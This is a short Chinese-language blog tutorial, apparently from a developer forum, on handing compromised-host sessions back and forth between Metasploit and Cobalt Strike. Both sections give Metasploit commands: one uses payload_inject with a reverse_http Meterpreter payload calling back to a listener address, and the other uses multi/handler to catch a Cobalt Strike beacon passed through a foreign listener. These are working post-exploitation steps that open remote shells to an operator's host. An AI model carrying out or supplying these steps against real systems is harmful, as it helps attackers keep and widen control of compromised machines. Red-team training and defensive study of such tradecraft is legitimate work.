cobalstrike 与 msf之间相互派生

msf派生shell给cobalstrike(必须有一个meterpreter)

首先在cobalstrike中添加监听器
在这里插入图片描述
回到msf中使用 exploit/windows/local/payload_inject 模块,后设置相关选项

set payload windows/meterpreter/reverse_http    #必须与cobalstrike中设置的payload相同
set lhost 192.168.0.136     					#cobalstrike的ip地址
set lport 777									#cobalstrike监听的端口
set disablepayloadhandler true					#告诉MSF说我们已经建立了监听器,不必再新建监听器
run												#运行

在这里插入图片描述
查看cobalstrike中获得了一个shell
在这里插入图片描述

Cobalt strike 派生 shell 给 MSF(前提有个beaconshell)

在msf使用监听模块。并设置相关选项

use exploit/multi/handler
set payload  windows/meterpreter/reverse_http
set lhost 192.168.0.136
set lport 9999
run -j

在这里插入图片描述

回到cobalstrike中添加监听器 payload为windows/foreign/reverse_http ip为msf的ip 监听端口为msf监听的端口
在这里插入图片描述
下图为刚创建的监听器
在这里插入图片描述
选中要派生的shell 右击spawn 选择刚刚创建的监听器
在这里插入图片描述
在这里插入图片描述

即可看到msf中获取到了meterpreter会话
在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值